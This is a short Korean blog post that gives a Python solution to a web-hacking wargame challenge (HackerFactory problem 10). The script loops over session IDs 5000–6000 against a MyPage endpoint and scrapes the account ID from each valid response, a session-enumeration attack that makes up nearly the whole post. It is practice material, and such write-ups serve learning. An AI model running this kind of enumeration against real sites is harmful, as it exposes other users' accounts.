HackerFactory 10번문제

2020. 1. 25. 18:440x0B Web Hacking

728x90
#-*-coding:utf-8-*-
import requests
import urllib3  

def Parse():
	urllib3.disable_warnings()
	#url_1 = "https://hackerfactory.co.kr/wargame/war10/login.php"
	url_2 = "https://hackerfactory.co.kr/wargame/war10/MyPage.php"

	#parseData = "<script>location.href='/bbs/login.php'</script><script>alert('ID 혹은 Password 가 입력 되지 않았습니다.');location.href='login.php';</script>"
	parseData = "존재하지 않는 회원입니다"
	rp = requests.post
	LOGIN_DATA = {
    'id': 'guest1',
    'password': 'guest1'
	}
	
	#res = rp(url_1,data=LOGIN_DATA,verify=False)
	#print (res.text)
	# range : 
	#print("[+] Login....")
	#res = rp(url_1,data=LOGIN_DATA,verify=False)
	#print(res.text)
	for i in range(5000,6001):
		SID = {
			'sid' : str(i)
		}

		# verify : prevent error of SSL
		res = rp(url_2,data=SID, verify=False)
		
		if parseData not in res.text:
			parse = res.text
			parse = parse.split("\"ID\" value=\"")
			parse = parse[1].split("\" disabled>")
			
			print (parse[0]),
			print (SID)

			
		else:
			print(i)
			#print(res.text)
			#print("Wrong "),
			#print(SID)
			continue
	print ("[+] Finish")
if __name__ == '__main__':
	Parse()
저작자표시

'0x0B Web Hacking' 카테고리의 다른 글

sqli practice  (0) 2020.07.14
Hackerone CMS V2 Flag02  (0) 2020.06.29
Hacker Factory 7번문제  (0) 2020.01.25
Hacker Factory 4번문제  (0) 2020.01.25
Hacker Factory 3번 문제  (0) 2020.01.25

관련글

티스토리툴바